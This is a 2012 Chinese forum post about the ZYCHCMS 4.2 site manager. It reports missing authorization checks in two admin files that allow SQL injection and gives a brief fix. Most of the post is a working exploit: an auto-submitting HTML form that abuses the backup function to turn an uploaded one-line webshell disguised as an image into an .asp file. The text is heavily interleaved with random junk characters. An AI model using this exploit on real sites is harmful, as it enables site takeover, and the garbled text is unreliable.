: K/ M; Z+ r. ~# \
$ g3 b2 L b' s% M
; w, r K9 M3 Q y, V0 k# t
" q' q) U7 R, F, S4 p影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
- `; u) J2 B7 C9 D2 L7 Q" U$ b ①SQL注射漏洞2 r* w9 O* C( k) Z% L# ?, P8 J
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp: W# G( f4 y( R1 y! V
漏洞原因:未过滤9 \5 U$ Y9 W' d, Y1 b" t
漏洞代码:
# U9 v' h2 U1 ^6 N7 }' ] 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。+ d/ k" M' c1 {/ e
修复方法:在文件开头加入代码% S5 q9 N$ Y: x. |2 [0 ]' |3 [
/ Y) n1 r+ C9 Q+ s, \7 ]# }
8 {- x7 b2 w" i$ x! j* {②后台拿WBSHELL" i4 u& G8 \3 b/ B A5 b
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
" z) v+ e9 N0 v9 Y 这里在网上找了一个,改了下,将就着用。; o, m2 Z) X! R9 g; _1 i
以下是代码本地提交代码
b( c; U, ]! o0 e! A0 [( A . J2 c; h+ S+ q9 G% d* B
! P8 _5 L; u( m% U' U( |
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>6 R" s* C9 X. ^$ f f1 J. S
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>& X& g, @5 P" S4 V8 D8 ~9 t) j
<tr>
' o1 Y8 {$ x$ R7 B( t5 G1 a <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>1 H* k" c- C9 H6 v, n& R
</tr>
5 `4 N9 W+ u# s$ X7 _3 R; F <tr>: V- u9 j* e, j! ^, e4 L
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
$ a j+ P4 J4 f" | </span>* [$ x* ?) Z V0 M5 N* C
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >8 l$ j+ r% ]. H( P
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
. C: z2 O( F& o4 s/ Q <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>1 J$ J H7 S) D" E, z
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
+ u9 ^& u! ^. s4 f8 p% ]# Z <div align=”left”>
n: G9 g7 L! Q1 ]4 Q <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
- C \8 W- a& l8 G2 m' S- r) O <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>& l& b) q9 E, V) c/ s
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />: q: @' `2 E3 M) Y, Q: `$ K
</div></td>
) g; d) |+ c" b( u% w) V* b" A: S </tr>
6 C5 N$ u7 \& _1 `+ @/ z! y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>+ a# t& J9 P; ?0 O) v
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
) L- p" X. w6 [! H1 V2 ^ V <td class=”td”><div align=”left”>
) T: q7 o c& ~9 V% M8 g) ^1 K4 P <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
5 F L& |8 E2 p1 _' ~8 i- l [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>/ N' b; }6 Q: p1 {' j8 d
</tr>, q1 [# N+ S2 f; C& W
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
$ k, D$ l$ k* l1 ?7 C3 w! M w <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>4 ^- l, }8 c: A3 {
<td class=”td”><div align=”left”>
/ S+ |5 U: d/ v; ~. l% |" H! J <input type=”submit” value=”确定备份” class=”btn”
7 k( `- x6 j) {7 h4 y3 p' | </div></td>7 m* K4 Z5 |+ i4 N) j3 V0 Y4 G
</tr>: U% V- ~8 ^: Z6 x/ U* G& X
</table></td></tr></form>: S/ I% H4 f; N) m# K. D. M" N
</table>
' O0 s7 N! C2 X </td>
5 G8 t6 a0 g, S- ]# m) c- | </tr>
* t, o: z3 N" A% K# _. ` </table>
+ n" q7 {# o; J1 p. G <script>
M* y- ^; u, x1 Z$ L7 [ document.all.add.submit();. V1 O, ^ K) x) R
</script>% }: L6 K3 W2 s; ~+ e: z
& x6 m; e, R# Q( [
) Z5 Y/ ^; a6 r) F
+ o: b+ Q" k; X/ B5 g+ Q
+ g! r* J* L: ~+ I; @& L5 R, x# }' X+ j P8 c
5 y+ `% R x% P8 Z+ ~" @# t; K& s6 f8 X$ M; l& h' w i
9 n5 ^- w! V% f
& j+ s, h& {" L# N) w+ T4 Z
. z0 j% {' k2 H# I |
发表于 2012-9-10 21:09:51
收藏
支持
反对